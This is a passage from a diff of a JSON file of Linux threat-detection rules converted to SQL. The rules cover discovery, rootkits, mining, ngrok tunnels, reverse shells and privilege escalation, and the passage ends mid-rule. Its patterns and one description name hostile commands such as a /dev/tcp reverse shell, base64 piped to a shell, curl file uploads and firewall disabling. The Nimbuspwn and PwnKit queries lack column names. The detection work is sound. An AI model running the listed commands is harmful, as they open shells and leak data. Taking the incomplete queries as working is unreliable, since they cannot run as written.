"676381a6-15ca-4d73-a9c8-6a22e970b90d", + "description": "Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings", + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2022.33891" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administration activities" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (ParentImage LIKE '%\\\\bash' ESCAPE '\\' AND (CommandLine LIKE '%id -Gn `%' ESCAPE '\\' OR CommandLine LIKE '%id -Gn ''%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%/groups' ESCAPE '\\' OR ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\') AND CommandLine LIKE '%/etc/group%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" + "filename": "proc_creation_lnx_local_groups.yml" }, { "title": "Local System Accounts Discovery - Linux", @@ -2061,411 +2115,420 @@ "filename": "proc_creation_lnx_local_account.yml" }, { - "title": "Process Discovery", - "id": "4e2f5868-08d4-413d-899f-dc2f1508627b", - "description": "Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n", - "author": "Ömer Günal, oscd.community", + "title": "System Network Discovery - Linux", + "id": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", + "description": "Detects enumeration of local network configuration", + "author": "Ömer Günal and remotephone, oscd.community", "tags": [ "attack.discovery", - "attack.t1057" + "attack.t1016" ], "falsepositives": [ "Legitimate administration activities" ], "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/ps' ESCAPE '\\' OR Image LIKE '%/top' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/firewall-cmd' ESCAPE '\\' OR Image LIKE '%/ufw' ESCAPE '\\' OR Image LIKE '%/iptables' ESCAPE '\\' OR Image LIKE '%/netstat' ESCAPE '\\' OR Image LIKE '%/ss' ESCAPE '\\' OR Image LIKE '%/ip' ESCAPE '\\' OR Image LIKE '%/ifconfig' ESCAPE '\\' OR Image LIKE '%/systemd-resolve' ESCAPE '\\' OR Image LIKE '%/route' ESCAPE '\\') OR CommandLine LIKE '%/etc/resolv.conf%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_process_discovery.yml" + "filename": "proc_creation_lnx_system_network_discovery.yml" }, { - "title": "History File Deletion", - "id": "1182f3b3-e716-4efa-99ab-d2685d04360f", - "description": "Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Triple Cross eBPF Rootkit Install Commands", + "id": "22236d75-d5a0-4287-bf06-c93b1770860f", + "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1565.001" + "attack.defense_evasion", + "attack.t1014" ], "falsepositives": [ - "Legitimate administration activities" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/rm' ESCAPE '\\' OR Image LIKE '%/unlink' ESCAPE '\\' OR Image LIKE '%/shred' ESCAPE '\\') AND ((CommandLine LIKE '%/.bash\\_history%' ESCAPE '\\' OR CommandLine LIKE '%/.zsh\\_history%' ESCAPE '\\') OR (CommandLine LIKE '%\\_history' ESCAPE '\\' OR CommandLine LIKE '%.history' ESCAPE '\\' OR CommandLine LIKE '%zhistory' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Image LIKE '%/sudo' ESCAPE '\\' AND CommandLine LIKE '% tc %' ESCAPE '\\' AND CommandLine LIKE '% enp0s3 %' ESCAPE '\\' AND (CommandLine LIKE '% qdisc %' ESCAPE '\\' OR CommandLine LIKE '% filter %' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_susp_history_delete.yml" + "filename": "proc_creation_lnx_triple_cross_rootkit_install.yml" }, { - "title": "Linux Package Uninstall", - "id": "95d61234-7f56-465c-6f2d-b562c6fedbc4", - "description": "Detects linux package removal using builtin tools such as \"yum\", \"apt\", \"apt-get\" or \"dpkg\".", - "author": "Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)", + "title": "OMIGOD SCX RunAsProvider ExecuteScript", + "id": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", + "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" ], "falsepositives": [ - "Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting)." + "Legitimate use of SCX RunAsProvider ExecuteScript." ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/yum' ESCAPE '\\' AND (CommandLine LIKE '%erase%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\')) OR ((Image LIKE '%/apt' ESCAPE '\\' OR Image LIKE '%/apt-get' ESCAPE '\\') AND (CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%purge%' ESCAPE '\\')) OR (Image LIKE '%/dpkg' ESCAPE '\\' AND (CommandLine LIKE '%--remove %' ESCAPE '\\' OR CommandLine LIKE '% -r %' ESCAPE '\\')) OR (Image LIKE '%/rpm' ESCAPE '\\' AND CommandLine LIKE '% -e %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (User = 'root' AND LogonId = '0' AND CurrentDirectory = '/var/opt/microsoft/scx/tmp' AND CommandLine LIKE '%/etc/opt/microsoft/scx/conf/tmpdir/scx%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_remove_package.yml" + "filename": "proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" }, { - "title": "Linux Crypto Mining Indicators", - "id": "9069ea3c-b213-4c52-be13-86506a227ab1", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "Group Has Been Deleted Via Groupdel", + "id": "8a46f16c-8c4c-82d1-b121-0fdd3ba70a84", + "description": "Detects execution of the \"groupdel\" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks", + "author": "Tuan Le (NCSGroup)", + "tags": [ + "attack.impact", + "attack.t1531" + ], "falsepositives": [ - "Legitimate use of crypto miners" + "Legitimate administrator activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%sh -c /sbin/modprobe msr allow\\_writes=on%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE Image LIKE '%/groupdel' ESCAPE '\\'" ], - "filename": "proc_creation_lnx_crypto_mining.yml" + "filename": "proc_creation_lnx_groupdel.yml" }, { - "title": "Suspicious Curl File Upload - Linux", - "id": "00b90cc1-17ec-402c-96ad-3a8117d7a582", - "description": "Detects a suspicious curl process start the adds a file to a web request", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Copy Passwd Or Shadow From TMP Path", + "id": "fa4aaed5-4fe0-498d-bbc0-08e3346387ba", + "description": "Detects when the file \"passwd\" or \"shadow\" is copied from tmp path", + "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ - "Scripts created by developers and admins" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/curl' ESCAPE '\\' AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%/cp' ESCAPE '\\' AND CommandLine LIKE '%/tmp/%' ESCAPE '\\' AND (CommandLine LIKE '%passwd%' ESCAPE '\\' OR CommandLine LIKE '%shadow%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_susp_curl_fileupload.yml" + "filename": "proc_creation_lnx_cp_passwd_or_shadow_tmp.yml" }, { - "title": "Nohup Execution", - "id": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", - "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "title": "Linux HackTool Execution", + "id": "a015e032-146d-4717-8944-7a1884122111", + "description": "Detects known hacktool execution based on image name", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution" + ], "falsepositives": [ - "Administrators or installed processes that leverage nohup" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE Image LIKE '%/nohup' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((Image LIKE '%/sqlmap' ESCAPE '\\' OR Image LIKE '%/teamserver' ESCAPE '\\' OR Image LIKE '%/aircrack-ng' ESCAPE '\\' OR Image LIKE '%/john' ESCAPE '\\' OR Image LIKE '%/setoolkit' ESCAPE '\\' OR Image LIKE '%/wpscan' ESCAPE '\\' OR Image LIKE '%/hydra' ESCAPE '\\' OR Image LIKE '%/nikto' ESCAPE '\\' OR Image LIKE '%/ebpfkit' ESCAPE '\\' OR Image LIKE '%/bpfdos' ESCAPE '\\' OR Image LIKE '%/exechijack' ESCAPE '\\' OR Image LIKE '%/pidhide' ESCAPE '\\' OR Image LIKE '%/writeblocker' ESCAPE '\\') OR Image LIKE '%/linpeas%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_nohup.yml" + "filename": "proc_creation_lnx_hack_tools.yml" }, { - "title": "Linux Recon Indicators", - "id": "0cf7a157-8879-41a2-8f55-388dd23746b7", - "description": "Detects events with patterns found in commands used for reconnaissance on linux systems", - "author": "Florian Roth (Nextron Systems)", + "title": "User Has Been Deleted Via Userdel", + "id": "08f26069-6f80-474b-8d1f-d971c6fedea0", + "description": "Detects execution of the \"userdel\" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks", + "author": "Tuan Le (NCSGroup)", "tags": [ - "attack.reconnaissance", - "attack.t1592.004", - "attack.credential_access", - "attack.t1552.001" + "attack.impact", + "attack.t1531" ], "falsepositives": [ - "Legitimate administration activities" + "Legitimate administrator activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (CommandLine LIKE '% -name .htpasswd%' ESCAPE '\\' OR CommandLine LIKE '% -perm -4000 %' ESCAPE '\\')" + "SELECT * FROM logs WHERE Image LIKE '%/userdel' ESCAPE '\\'" ], - "filename": "proc_creation_lnx_susp_recon_indicators.yml" + "filename": "proc_creation_lnx_userdel.yml" }, { - "title": "System Network Discovery - Linux", - "id": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", - "description": "Detects enumeration of local network configuration", - "author": "Ömer Günal and remotephone, oscd.community", + "title": "Linux Base64 Encoded Pipe to Shell", + "id": "ba592c6d-6888-43c3-b8c6-689b8fe47337", + "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1016" + "attack.defense_evasion", + "attack.t1140" ], "falsepositives": [ "Legitimate administration activities" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/firewall-cmd' ESCAPE '\\' OR Image LIKE '%/ufw' ESCAPE '\\' OR Image LIKE '%/iptables' ESCAPE '\\' OR Image LIKE '%/netstat' ESCAPE '\\' OR Image LIKE '%/ss' ESCAPE '\\' OR Image LIKE '%/ip' ESCAPE '\\' OR Image LIKE '%/ifconfig' ESCAPE '\\' OR Image LIKE '%/systemd-resolve' ESCAPE '\\' OR Image LIKE '%/route' ESCAPE '\\') OR CommandLine LIKE '%/etc/resolv.conf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (CommandLine LIKE '%base64 -w0 %' ESCAPE '\\' AND ((CommandLine LIKE '%| bash %' ESCAPE '\\' OR CommandLine LIKE '%| sh %' ESCAPE '\\' OR CommandLine LIKE '%|bash %' ESCAPE '\\' OR CommandLine LIKE '%|sh %' ESCAPE '\\') OR (CommandLine LIKE '%| bash' ESCAPE '\\' OR CommandLine LIKE '%| sh' ESCAPE '\\' OR CommandLine LIKE '%|bash' ESCAPE '\\' OR CommandLine LIKE '% |sh' ESCAPE '\\')))" ], - "filename": "proc_creation_lnx_system_network_discovery.yml" + "filename": "proc_creation_lnx_base64_execution.yml" }, { - "title": "Security Software Discovery - Linux", - "id": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", - "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery", - "author": "Daniil Yugoslavskiy, oscd.community", - "tags": [ - "attack.discovery", - "attack.t1518.001" - ], + "title": "Linux Crypto Mining Pool Connections", + "id": "a46c93b7-55ed-4d27-a41b-c259456c4746", + "description": "Detects process connections to a Monero crypto mining pool", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate activities" + "Legitimate use of crypto miners" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/grep' ESCAPE '\\' OR Image LIKE '%/egrep' ESCAPE '\\') AND (CommandLine LIKE '%nessusd%' ESCAPE '\\' OR CommandLine LIKE '%td-agent%' ESCAPE '\\' OR CommandLine LIKE '%packetbeat%' ESCAPE '\\' OR CommandLine LIKE '%filebeat%' ESCAPE '\\' OR CommandLine LIKE '%auditbeat%' ESCAPE '\\' OR CommandLine LIKE '%osqueryd%' ESCAPE '\\' OR CommandLine LIKE '%cbagentd%' ESCAPE '\\' OR CommandLine LIKE '%falcond%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream')" ], - "filename": "proc_creation_lnx_security_software_discovery.yml" + "filename": "net_connection_lnx_crypto_mining_indicators.yml" }, { - "title": "User Added To Root/Sudoers Group Using Usermod", - "id": "6a50f16c-3b7b-42d1-b081-0fdd3ba70a73", - "description": "Detects usage of the \"usermod\" binary to add users add users to the root or suoders groups", - "author": "TuanLe (GTSC)", + "title": "Communication To Ngrok Tunneling Service - Linux", + "id": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Legitimate administrator activities" + "Legitimate use of ngrok" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/usermod' ESCAPE '\\' AND (CommandLine LIKE '%-aG root%' ESCAPE '\\' OR CommandLine LIKE '%-aG sudoers%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_usermod_susp_group.yml" + "filename": "net_connection_lnx_ngrok_tunnel.yml" }, { - "title": "Print History File Contents", - "id": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", - "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance", + "title": "Linux Reverse Shell Indicator", + "id": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", + "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.reconnaissance", - "attack.t1592.004" - ], "falsepositives": [ - "Legitimate administration activities" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\') AND ((CommandLine LIKE '%/.bash\\_history%' ESCAPE '\\' OR CommandLine LIKE '%/.zsh\\_history%' ESCAPE '\\') OR (CommandLine LIKE '%\\_history' ESCAPE '\\' OR CommandLine LIKE '%.history' ESCAPE '\\' OR CommandLine LIKE '%zhistory' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Image LIKE '%/bin/bash' ESCAPE '\\' AND NOT (DestinationIp IN ('127.0.0.1', '0.0.0.0')))" ], - "filename": "proc_creation_lnx_susp_history_recon.yml" + "filename": "net_connection_lnx_back_connect_shell_dev.yml" }, { - "title": "Suspicious Curl Change User Agents - Linux", - "id": "b86d356d-6093-443d-971c-9b07db583c68", - "description": "Detects a suspicious curl process start on linux with set useragent options", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Disabling Security Tools - Builtin", + "id": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", + "description": "Detects disabling security tools", + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1071.001" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/curl' ESCAPE '\\' AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (logs MATCH ('\"stopping iptables\" OR \"stopping ip6tables\" OR \"stopping firewalld\" OR \"stopping cbdaemon\" OR \"stopping falcon-sensor\"'))" ], - "filename": "proc_creation_lnx_susp_curl_useragent.yml" + "filename": "lnx_syslog_security_tools_disabling_syslog.yml" }, { - "title": "Ufw Force Stop Using Ufw-Init", - "id": "84c9e83c-599a-458a-a0cb-0ecce44e807a", - "description": "Detects attempts to force stop the ufw using ufw-init", - "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", + "title": "Suspicious Named Error", + "id": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", + "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.initial_access", + "attack.t1190" ], "falsepositives": [ - "Network administrators" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((CommandLine LIKE '%-ufw-init%' ESCAPE '\\' AND CommandLine LIKE '%force-stop%' ESCAPE '\\') OR (CommandLine LIKE '%ufw%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (logs MATCH ('\" dropping source port zero packet from \" OR \" denied AXFR from \" OR \" exiting (due to fatal error)\"'))" ], - "filename": "proc_creation_lnx_disable_ufw.yml" + "filename": "lnx_syslog_susp_named.yml" }, { - "title": "Capabilities Discovery - Linux", - "id": "d8d97d51-122d-4cdd-9e2f-01b4b4933530", - "description": "Detects usage of \"getcap\" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "JexBoss Command Sequence", + "id": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", + "description": "Detects suspicious command sequence that JexBoss", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.execution", + "attack.t1059.004" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/getcap' ESCAPE '\\' AND (CommandLine LIKE '% /r %' ESCAPE '\\' OR CommandLine LIKE '% -r %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (logs MATCH ('\"bash -c /bin/bash\" AND \"&/dev/tcp/\"'))" ], - "filename": "proc_creation_lnx_capa_discovery.yml" + "filename": "lnx_susp_jexboss.yml" }, { - "title": "Potential Discovery Activity Using Find - Linux", - "id": "8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf", - "description": "Detects usage of \"find\" binary in a suspicious manner to perform discovery", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Nimbuspwn Exploitation", + "id": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", + "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/find' ESCAPE '\\' AND (CommandLine LIKE '%-perm -4000%' ESCAPE '\\' OR CommandLine LIKE '%-perm -2000%' ESCAPE '\\' OR CommandLine LIKE '%-perm 0777%' ESCAPE '\\' OR CommandLine LIKE '%-perm -222%' ESCAPE '\\' OR CommandLine LIKE '%-perm -o w%' ESCAPE '\\' OR CommandLine LIKE '%-perm -o x%' ESCAPE '\\' OR CommandLine LIKE '%-perm -u=s%' ESCAPE '\\' OR CommandLine LIKE '%-perm -g=s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ( = 'networkd-dispatcher' AND = 'Error handling notification for interface' AND = '../../')" ], - "filename": "proc_creation_lnx_susp_find_execution.yml" + "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml" }, { - "title": "Linux Shell Pipe to Shell", - "id": "880973f3-9708-491c-a77b-2a35a1921158", - "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell", - "author": "Florian Roth (Nextron Systems)", + "title": "Modifying Crontab", + "id": "af202fd3-7bff-4212-a25a-fb34606cfcbe", + "description": "Detects suspicious modification of crontab file.", + "author": "Pawel Mazur", "tags": [ - "attack.defense_evasion", - "attack.t1140" + "attack.persistence", + "attack.t1053.003" ], "falsepositives": [ - "Legitimate software that uses these patterns" + "Legitimate modification of crontab" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((CommandLine LIKE 'sh -c %' ESCAPE '\\' OR CommandLine LIKE 'bash -c %' ESCAPE '\\') AND ((CommandLine LIKE '%| bash %' ESCAPE '\\' OR CommandLine LIKE '%| sh %' ESCAPE '\\' OR CommandLine LIKE '%|bash %' ESCAPE '\\' OR CommandLine LIKE '%|sh %' ESCAPE '\\') OR (CommandLine LIKE '%| bash' ESCAPE '\\' OR CommandLine LIKE '%| sh' ESCAPE '\\' OR CommandLine LIKE '%|bash' ESCAPE '\\' OR CommandLine LIKE '% |sh' ESCAPE '\\')))" + "SELECT * FROM logs WHERE logs MATCH ('\"REPLACE\"')" ], - "filename": "proc_creation_lnx_susp_pipe_shell.yml" + "filename": "lnx_cron_crontab_file_modification.yml" }, { - "title": "Disabling Security Tools", - "id": "e3a8a052-111f-4606-9aee-f28ebeb76776", - "description": "Detects disabling security tools", - "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "title": "PwnKit Local Privilege Escalation", + "id": "0506a799-698b-43b4-85a1-ac4c84c720e9", + "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs", + "author": "Sreeman", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.privilege_escalation", + "attack.t1548.001" ], "falsepositives": [ - "Legitimate administration activities" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/service' ESCAPE '\\' AND CommandLine LIKE '%iptables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/service' ESCAPE '\\' AND CommandLine LIKE '%ip6tables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/chkconfig' ESCAPE '\\' AND CommandLine LIKE '%iptables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/chkconfig' ESCAPE '\\' AND CommandLine LIKE '%ip6tables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%firewalld%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%firewalld%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (Image LIKE '%/service' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/chkconfig' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (Image LIKE '%/setenforce' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%falcon-sensor%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\' AND CommandLine LIKE '%falcon-sensor%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ( = 'pkexec' AND = 'The value for environment variable XAUTHORITY contains suscipious content' AND = '[USER=root] [TTY=/dev/pts/0]')" ], - "filename": "proc_creation_lnx_security_tools_disabling.yml" + "filename": "lnx_auth_pwnkit_local_privilege_escalation.yml" }, { - "title": "File Deletion", - "id": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", - "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", - "author": "Ömer Günal, oscd.community", + "title": "Shellshock Expression", + "id": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", + "description": "Detects shellshock expressions in log files", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Legitimate administration activities" + "Unknown" ], - "level": "informational", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/rm' ESCAPE '\\' OR Image LIKE '%/shred' ESCAPE '\\' OR Image LIKE '%/unlink' ESCAPE '\\')" + "SELECT * FROM logs WHERE (logs MATCH 